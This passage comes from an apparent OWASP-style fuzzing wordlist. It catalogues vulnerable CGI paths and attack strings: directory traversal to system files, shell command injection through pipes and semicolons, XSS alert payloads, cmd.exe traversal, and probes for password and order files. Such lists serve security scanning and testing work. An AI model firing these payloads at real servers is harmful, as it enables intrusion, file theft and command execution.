awstats/awstats.pl&lt;br /&gt;
ax-admin.cgi&lt;br /&gt;
ax.cgi&lt;br /&gt;
axs.cgi&lt;br /&gt;
badmin.cgi&lt;br /&gt;
banner.cgi&lt;br /&gt;
bannereditor.cgi&lt;br /&gt;
bash&lt;br /&gt;
bb-hist?HI&lt;br /&gt;
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK&lt;br /&gt;
bbs_forum.cgi&lt;br /&gt;
betsie/parserl.pl/&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;;&lt;br /&gt;
bigconf.cgi?command=view_textfile&amp;amp;file={KNOWNFILE}&amp;amp;filters=&lt;br /&gt;
bizdb1-search.cgi&lt;br /&gt;
blog/&lt;br /&gt;
blog/mt-check.cgi&lt;br /&gt;
blog/mt-load.cgi&lt;br /&gt;
blog/mt.cfg&lt;br /&gt;
bnbform&lt;br /&gt;
bnbform.cgi&lt;br /&gt;
book.cgi?action=default&amp;amp;current=|cat%20{KNOWNFILE}|&amp;amp;form_tid=996604045&amp;amp;prev=main.html&amp;amp;list_message_index=10&lt;br /&gt;
boozt/admin/index.cgi?section=5&amp;amp;input=1&lt;br /&gt;
bsguest.cgi?email=x;ls&lt;br /&gt;
bslist.cgi?email=x;ls&lt;br /&gt;
build.cgi&lt;br /&gt;
bulk/bulk.cgi&lt;br /&gt;
c_download.cgi&lt;br /&gt;
cached_feed.cgi&lt;br /&gt;
cachemgr.cgi&lt;br /&gt;
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
calendar&lt;br /&gt;
calendar.php?calbirthdays=1&amp;amp;action=getday&amp;amp;day=2001-8-15&amp;amp;comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22&lt;br /&gt;
calendar.pl&lt;br /&gt;
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calendar/index.cgi&lt;br /&gt;
calendar_admin.pl?config=|cat%20{KNOWNFILE}|&lt;br /&gt;
calender_admin.pl&lt;br /&gt;
campas?%0acat%0a{KNOWNFILE}%0a&lt;br /&gt;
cart.pl&lt;br /&gt;
cart.pl?db='&lt;br /&gt;
cartmanager.cgi&lt;br /&gt;
cbmc/forums.cgi&lt;br /&gt;
ccbill-local.cgi?cmd=MENU&lt;br /&gt;
ccbill-local.pl?cmd=MENU&lt;br /&gt;
cgforum.cgi&lt;br /&gt;
cgi-lib.pl&lt;br /&gt;
cgicso?query=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cgicso?query=AAA&lt;br /&gt;
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
cgiwrap&lt;br /&gt;
cgiwrap/%3Cfont%20color=red%3E&lt;br /&gt;
cgiwrap/~@U&lt;br /&gt;
cgiwrap/~JUNK(5)&lt;br /&gt;
cgiwrap/~root&lt;br /&gt;
change-your-password.pl&lt;br /&gt;
classified.cgi&lt;br /&gt;
classifieds&lt;br /&gt;
classifieds.cgi&lt;br /&gt;
classifieds/classifieds.cgi&lt;br /&gt;
classifieds/index.cgi&lt;br /&gt;
clickcount.pl?view=test&lt;br /&gt;
clickresponder.pl&lt;br /&gt;
code.php&lt;br /&gt;
code.php3&lt;br /&gt;
com5..........................................................................................................................................................................................................................box&lt;br /&gt;
com5.java&lt;br /&gt;
com5.pl&lt;br /&gt;
commandit.cgi&lt;br /&gt;
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html&lt;br /&gt;
common.php?f=0&amp;amp;ForumLang=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
common/listrec.pl&lt;br /&gt;
common/listrec.pl?APP=qmh-news&amp;amp;TEMPLATE=;ls%20/etc|&lt;br /&gt;
compatible.cgi&lt;br /&gt;
count.cgi&lt;br /&gt;
counter-ord&lt;br /&gt;
counterbanner&lt;br /&gt;
counterbanner-ord&lt;br /&gt;
counterfiglet-ord&lt;br /&gt;
counterfiglet/nc/&lt;br /&gt;
cs&lt;br /&gt;
csChatRBox.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csGuestBook.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csLive&lt;br /&gt;
csNews.cgi&lt;br /&gt;
csNewsPro.cgi?command=savesetup&amp;amp;setup=;system('cat%20{KNOWNFILE}')&lt;br /&gt;
csPassword.cgi&lt;br /&gt;
csPassword/csPassword.cgi&lt;br /&gt;
csh&lt;br /&gt;
cstat.pl&lt;br /&gt;
cutecast/members/&lt;br /&gt;
cvsblame.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=*&amp;amp;rev=&amp;amp;root=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvslog.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?branch=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;date=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&lt;br /&gt;
cvsquery.cgi?module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=&amp;amp;dir=&amp;amp;file=&amp;amp;who=&amp;lt;script&amp;gt;alert(document.domain)&amp;lt;/script&amp;gt;&amp;amp;sortby=Date&amp;amp;hours=2&amp;amp;date=week&lt;br /&gt;
cvsqueryform.cgi?cvsroot=/cvsroot&amp;amp;module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=HEAD&lt;br /&gt;
dansguardian.pl?DENIEDURL=&amp;lt;/a&amp;gt;&amp;lt;script&amp;gt;alert('XSS');&amp;lt;/script&amp;gt;&lt;br /&gt;
dasp/fm_shell.asp&lt;br /&gt;
data/fetch.php?page=&lt;br /&gt;
date&lt;br /&gt;
day5datacopier.cgi&lt;br /&gt;
day5datanotifier.cgi&lt;br /&gt;
db2www/library/document.d2w/show&lt;br /&gt;
db4web_c/dbdirname/{KNOWNFILE}&lt;br /&gt;
db_manager.cgi&lt;br /&gt;
dbman/db.cgi?db=no-db&lt;br /&gt;
dcforum.cgi?az=list&amp;amp;forum=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
dcshop/auth_data/auth_user_file.txt&lt;br /&gt;
dcshop/orders/orders.txt&lt;br /&gt;
dfire.cgi&lt;br /&gt;
diagnose.cgi&lt;br /&gt;
dig.cgi&lt;br /&gt;
directorypro.cgi?want=showcat&amp;amp;show=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
displayTC.pl&lt;br /&gt;
dnewsweb&lt;br /&gt;
donothing&lt;br /&gt;
dose.pl?daily&amp;amp;somefile.txt&amp;amp;|ls|&lt;br /&gt;
download.cgi&lt;br /&gt;
dumpenv.pl&lt;br /&gt;
edit.pl&lt;br /&gt;
empower?DB=whateverwhatever&lt;br /&gt;
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
enter.cgi&lt;br /&gt;
environ.cgi&lt;br /&gt;
environ.pl&lt;br /&gt;
environ.pl?param1=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
eshop.pl/seite=;cat%20eshop.pl|&lt;br /&gt;
ex-logger.pl&lt;br /&gt;
excite&lt;br /&gt;
excite;IF&lt;br /&gt;
ezadmin.cgi&lt;br /&gt;
ezboard.cgi&lt;br /&gt;
ezman.cgi&lt;br /&gt;
ezshopper/loadpage.cgi?user_id=1&amp;amp;file=|cat%20{KNOWNFILE}|&lt;br /&gt;
ezshopper/search.cgi?user_id=id&amp;amp;database=dbase1.exm&amp;amp;template=../../../../../../..{KNOWNFILE}&amp;amp;distinct=1&lt;br /&gt;
ezshopper2/loadpage.cgi&lt;br /&gt;
ezshopper3/loadpage.cgi&lt;br /&gt;
faqmanager.cgi?toc={KNOWNFILE}%00&lt;br /&gt;
faxsurvey?cat%20{KNOWNFILE}&lt;br /&gt;
filemail&lt;br /&gt;
filemail.pl&lt;br /&gt;
finger&lt;br /&gt;
finger.pl&lt;br /&gt;
flexform&lt;br /&gt;
flexform.cgi&lt;br /&gt;
fom.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
fom/fom.cgi?cmd=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=1&amp;amp;keywords=vulnerable&lt;br /&gt;
formmail&lt;br /&gt;
formmail.cgi&lt;br /&gt;
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail.pl&lt;br /&gt;
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
fortune&lt;br /&gt;
ftp.pl&lt;br /&gt;
ftpsh&lt;br /&gt;
gH.cgi&lt;br /&gt;
gbadmin.cgi?action=change_adminpass&lt;br /&gt;
gbadmin.cgi?action=change_automail&lt;br /&gt;
gbadmin.cgi?action=colors&lt;br /&gt;
gbadmin.cgi?action=setup&lt;br /&gt;
gbook/gbook.cgi?_MAILTO=xx;ls&lt;br /&gt;
gbpass.pl&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1&lt;br /&gt;
getdoc.cgi&lt;br /&gt;
gettransbitmap&lt;br /&gt;
glimpse&lt;br /&gt;
gm-authors.cgi&lt;br /&gt;
gm-cplog.cgi&lt;br /&gt;
gm.cgi&lt;br /&gt;
guestbook.cgi&lt;br /&gt;
guestbook.cgi?user=cpanel&amp;amp;template=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
guestbook.pl&lt;br /&gt;
guestbook/passwd&lt;br /&gt;
handler.cgi&lt;br /&gt;
hitview.cgi&lt;br /&gt;
horde/test.php&lt;br /&gt;
horde/test.php?mode=phpinfo&lt;br /&gt;
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
htgrep?file=index.html&amp;amp;hdr={KNOWNFILE}&lt;br /&gt;
html2chtml.cgi&lt;br /&gt;
html2wml.cgi&lt;br /&gt;
htmlscript?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E&lt;br /&gt;
htsearch?-c/nonexistant&lt;br /&gt;
htsearch?config=foofighter&amp;amp;restrict=&amp;amp;exclude=&amp;amp;method=and&amp;amp;format=builtin-long&amp;amp;sort=score&amp;amp;words=&lt;br /&gt;
htsearch?exclude=%60{KNOWNFILE}%60&lt;br /&gt;
ibill.pm&lt;br /&gt;
icat&lt;br /&gt;
if/admin/nph-build.cgi&lt;br /&gt;
ikonboard/help.cgi?&lt;br /&gt;
imageFolio.cgi&lt;br /&gt;
imagefolio/admin/admin.cgi&lt;br /&gt;
imagemap&lt;br /&gt;
include/new-visitor.inc.php&lt;br /&gt;
index.js0x70&lt;br /&gt;
index.pl&lt;br /&gt;
info2www&lt;br /&gt;
info2www '(../../../../../../../bin/mail root &amp;lt;{KNOWNFILE}&amp;gt;&lt;br /&gt;
infosrch.cgi&lt;br /&gt;
ion-p?page=../../../../..{KNOWNFILE}&lt;br /&gt;
jailshell&lt;br /&gt;
jj&lt;br /&gt;
journal.cgi?folder=journal.cgi%00&lt;br /&gt;
ksh&lt;br /&gt;
lastlines.cgi?process&lt;br /&gt;
listrec.pl&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
log-reader.cgi&lt;br /&gt;
log/&lt;br /&gt;
log/nether-log.pl?checkit&lt;br /&gt;
login.cgi&lt;br /&gt;
login.pl&lt;br /&gt;
login.pl?course_id=\&lt;br /&gt;
logit.cgi&lt;br /&gt;
logs.pl&lt;br /&gt;
logs/&lt;br /&gt;
logs/access_log&lt;br /&gt;
logs/error_log&lt;br /&gt;
lookwho.cgi&lt;br /&gt;
ls&lt;br /&gt;
lwgate&lt;br /&gt;
lwgate.cgi&lt;br /&gt;
magiccard.cgi?pa=3Dpreview&amp;amp;amp;next=3Dcustom&amp;amp;amp;page=3D../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mail&lt;br /&gt;
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mail/nph-mr.cgi?do=loginhelp&amp;amp;configLanguage=../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mailit.pl&lt;br /&gt;
maillist.cgi&lt;br /&gt;
maillist.pl&lt;br /&gt;
mailnews.cgi&lt;br /&gt;
main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
majordomo.pl&lt;br /&gt;
man2html&lt;br /&gt;
mastergate/search.cgi?search=0&amp;amp;search_on=all&lt;br /&gt;
meta.pl&lt;br /&gt;
mgrqcgi&lt;br /&gt;
mini_logger.cgi&lt;br /&gt;
mmstdod.cgi&lt;br /&gt;
moin.cgi?test&lt;br /&gt;
mojo/mojo.cgi&lt;br /&gt;
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=blah&lt;br /&gt;
ms_proxy_auth_query/&lt;br /&gt;
mt-static/&lt;br /&gt;
mt-static/mt-check.cgi&lt;br /&gt;
mt-static/mt-load.cgi&lt;br /&gt;
mt-static/mt.cfg&lt;br /&gt;
mt/&lt;br /&gt;
mt/mt-check.cgi&lt;br /&gt;
mt/mt-load.cgi&lt;br /&gt;
mt/mt.cfg&lt;br /&gt;
multihtml.pl?multi={KNOWNFILE}%00html&lt;br /&gt;
musicqueue.cgi&lt;br /&gt;
myguestbook.cgi?action=view&lt;br /&gt;
namazu.cgi&lt;br /&gt;
nbmember.cgi?cmd=list_all_users&lt;br /&gt;
netauth.cgi?cmd=show&amp;amp;page=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
netpad.cgi&lt;br /&gt;
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
nimages.php&lt;br /&gt;
nlog-smb.cgi&lt;br /&gt;
nlog-smb.pl&lt;br /&gt;
non-existent.pl&lt;br /&gt;
noshell&lt;br /&gt;
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
nph-error.pl&lt;br /&gt;
nph-exploitscanget.cgi&lt;br /&gt;
nph-maillist.pl&lt;br /&gt;
nph-publish&lt;br /&gt;
nph-publish.cgi&lt;br /&gt;
nph-showlogs.pl?files=../../&amp;amp;filter=.*&amp;amp;submit=Go&amp;amp;linecnt=500&amp;amp;refresh=0&lt;br /&gt;
nph-test-cgi&lt;br /&gt;
ntitar.pl&lt;br /&gt;
opendir.php?{KNOWNFILE}&lt;br /&gt;
orders/orders.txt&lt;br /&gt;
pagelog.cgi&lt;br /&gt;
pals-cgi?palsAction=restart&amp;amp;documentName={KNOWNFILE}&lt;br /&gt;
parse-file&lt;br /&gt;
pass&lt;br /&gt;
passwd&lt;br /&gt;
passwd.txt&lt;br /&gt;
password&lt;br /&gt;
pbcgi.cgi?name=Joe%Camel&amp;amp;email=%3C&lt;br /&gt;
perl&lt;br /&gt;
perl?-v&lt;br /&gt;
perlshop.cgi&lt;br /&gt;
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
phf&lt;br /&gt;
phf.cgi?QALIA&lt;br /&gt;
phf?Qname=root%0Acat%20{KNOWNFILE}%20&lt;br /&gt;
photo/&lt;br /&gt;
photo/manage.cgi&lt;br /&gt;
photo/protected/manage.cgi&lt;br /&gt;
php-cgi&lt;br /&gt;
php.cgi?{KNOWNFILE}&lt;br /&gt;
plusmail&lt;br /&gt;
pollit/Poll_It_&lt;br /&gt;
pollssi.cgi&lt;br /&gt;
post-query&lt;br /&gt;
post_query&lt;br /&gt;
postcards.cgi&lt;br /&gt;
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
printenv&lt;br /&gt;
printenv.tmp&lt;br /&gt;
probecontrol.cgi?command=enable&amp;amp;username=cancer&amp;amp;password=killer&lt;br /&gt;
processit.pl&lt;br /&gt;
profile.cgi&lt;br /&gt;
pu3.pl&lt;br /&gt;
publisher/search.cgi?dir=jobs&amp;amp;template=;cat%20{KNOWNFILE}|&amp;amp;output_number=10&lt;br /&gt;
query&lt;br /&gt;
query?mss=%2e%2e/config&lt;br /&gt;
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&amp;amp;cart_id=&lt;br /&gt;
quikstore.cfg&lt;br /&gt;
quizme.cgi&lt;br /&gt;
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ratlog.cgi&lt;br /&gt;
redirect&lt;br /&gt;
register.cgi&lt;br /&gt;
replicator/webpage.cgi/&lt;br /&gt;
responder.cgi&lt;br /&gt;
retrieve_password.pl&lt;br /&gt;
rksh&lt;br /&gt;
rmp_query&lt;br /&gt;
robadmin.cgi&lt;br /&gt;
robpoll.cgi&lt;br /&gt;
rpm_query&lt;br /&gt;
rsh&lt;br /&gt;
rtm.log&lt;br /&gt;
rwcgi60&lt;br /&gt;
rwcgi60/showenv&lt;br /&gt;
rwwwshell.pl&lt;br /&gt;
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1&lt;br /&gt;
sawmill?rfcf+%22&lt;br /&gt;
sbcgi/sitebuilder.cgi&lt;br /&gt;
scoadminreg.cgi&lt;br /&gt;
scripts/*%0a.pl&lt;br /&gt;
search.cgi&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
search.php?searchstring=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl&lt;br /&gt;
search.pl?Realm=All&amp;amp;Match=0&amp;amp;Terms=test&amp;amp;nocpp=1&amp;amp;maxhits=10&amp;amp;;Rank=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
search/search.cgi?keys=*&amp;amp;prc=any&amp;amp;catigory=../../../../../../../../../../../../etc&lt;br /&gt;
sendform.cgi&lt;br /&gt;
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message&lt;br /&gt;
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
session/adminlogin&lt;br /&gt;
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}&lt;br /&gt;
sh&lt;br /&gt;
shop.cgi?page=../../../../../../..{KNOWNFILE}&lt;br /&gt;
shop.pl/page=;cat%20shop.pl|&lt;br /&gt;
shop/auth_data/auth_user_file.txt&lt;br /&gt;
shop/orders/orders.txt&lt;br /&gt;
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
shopplus.cgi?dn=domainname.com&amp;amp;cartid=%CARTID%&amp;amp;file=;cat%20{KNOWNFILE}|&lt;br /&gt;
show.pl&lt;br /&gt;
showcheckins.cgi?person=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
showuser.cgi&lt;br /&gt;
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|&lt;br /&gt;
simplestguest.cgi&lt;br /&gt;
simplestmail.cgi&lt;br /&gt;
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
sojourn.cgi?cat=../../../../../../../../../../etc/password%00&lt;br /&gt;
spin_client.cgi?aaaaaaaa&lt;br /&gt;
ss&lt;br /&gt;
sscd_suncourier.pl&lt;br /&gt;
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}&lt;br /&gt;
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
stat.pl&lt;br /&gt;
stat/&lt;br /&gt;
stats-bin-p/reports/index.html&lt;br /&gt;
stats.pl&lt;br /&gt;
stats.prf&lt;br /&gt;
stats/&lt;br /&gt;
stats/statsbrowse.asp?filepath=c:\&amp;amp;Opt=3&lt;br /&gt;
stats_old/&lt;br /&gt;
statsconfig&lt;br /&gt;
statusconfig.pl&lt;br /&gt;
statview.pl&lt;br /&gt;
store.cgi?&lt;br /&gt;
store/agora.cgi?cart_id=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
store/agora.cgi?page=whatever33.html&lt;br /&gt;
store/index.cgi?page=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
survey&lt;br /&gt;
survey.cgi&lt;br /&gt;
sws/admin.html&lt;br /&gt;
sws/manager.pl&lt;br /&gt;
tablebuild.pl&lt;br /&gt;
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&amp;amp;action=view&amp;amp;matchview=1&lt;br /&gt;
tcsh&lt;br /&gt;
technote/main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=/../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
test-cgi.tcl&lt;br /&gt;
test-cgi?/*&lt;br /&gt;
test-env&lt;br /&gt;
test.cgi&lt;br /&gt;
test/test.cgi&lt;br /&gt;
texis/junk&lt;br /&gt;
texis/phine&lt;br /&gt;
textcounter.pl&lt;br /&gt;
tidfinder.cgi&lt;br /&gt;
tigvote.cgi&lt;br /&gt;
title.cgi&lt;br /&gt;
tpgnrock&lt;br /&gt;
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
troops.cgi&lt;br /&gt;
ttawebtop.cgi/?action=start&amp;amp;pg=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ultraboard.cgi&lt;br /&gt;
ultraboard.pl&lt;br /&gt;
unlg1.1&lt;br /&gt;
unlg1.2&lt;br /&gt;
update.dpgs&lt;br /&gt;
upload.cgi&lt;br /&gt;
uptime&lt;br /&gt;
urlcount.cgi?%3CIMG%20&lt;br /&gt;
ustorekeeper.pl?command=goto&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
utm/admin&lt;br /&gt;
utm/utm_stat&lt;br /&gt;
view-source&lt;br /&gt;
view-source?view-source&lt;br /&gt;
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
viewcvs.cgi/viewcvs/?cvsroot=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\&lt;br /&gt;
viewlogs.pl&lt;br /&gt;
viewsource?{KNOWNFILE}&lt;br /&gt;
viralator.cgi&lt;br /&gt;
virgil.cgi&lt;br /&gt;
vote.cgi&lt;br /&gt;
vpasswd.cgi&lt;br /&gt;
vq/demos/respond.pl?&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
w3-msql&lt;br /&gt;
w3-sql&lt;br /&gt;
wais.pl&lt;br /&gt;
way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
way-board/way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
webais&lt;br /&gt;
webbbs.cgi&lt;br /&gt;
webbbs/webbbs_config.pl?name=joe&amp;amp;email=test@example.com&amp;amp;body=aaaaffff&amp;amp;followup=10;cat%20{KNOWNFILE}&lt;br /&gt;
webcart/webcart.cgi?CONFIG=mountain&amp;amp;CHANGE=YE&lt;br /&gt;
webdist.cgi?distloc=;cat%20{KNOWNFILE}&lt;br /&gt;
webdriver&lt;br /&gt;
webgais&lt;br /&gt;
webif.cgi&lt;br /&gt;
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
webmap.cgi&lt;br /&gt;
webnews.pl&lt;br /&gt;
webplus?about&lt;br /&gt;
webplus?script=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
websendmail&lt;br /&gt;
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
webutil.pl&lt;br /&gt;
webutils.pl&lt;br /&gt;
webwho.pl&lt;br /&gt;
where.pl?sd=ls%20/etc&lt;br /&gt;
whois.cgi?action=load&amp;amp;whois=%3Bid&lt;br /&gt;
whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois/whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}&lt;br /&gt;
windmail&lt;br /&gt;
wrap&lt;br /&gt;
wrap.cgi&lt;br /&gt;
ws_ftp.ini&lt;br /&gt;
www-sql&lt;br /&gt;
wwwadmin.pl&lt;br /&gt;
wwwboard.cgi.cgi&lt;br /&gt;
wwwboard.pl&lt;br /&gt;
wwwstats.pl&lt;br /&gt;
wwwthreads/3tvars.pm&lt;br /&gt;
wwwthreads/w3tvars.pm&lt;br /&gt;
wwwwais&lt;br /&gt;
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
zsh&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Windows Directory Traversal   (Update: 17 March 2010  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Windows Directory Traversal   (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Generic 8 Directory Deep Traversal Fuzz (17 March 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Generic 8 Directory Deep Traversal Fuzz (17 March 2010) &lt;br /&gt;
# Derived from the awesome &amp;quot;Directory Traversal Fuzzing Code&amp;quot; v0.2 by Luca Carettoni&lt;br /&gt;
# Did some cleanup &amp;amp; removed anything to the right of {FILE} for inclusion in a&lt;br /&gt;
# separate fuzzfile for more flexibiity, for the OWASP Fuzzing Code Database. &lt;br /&gt;
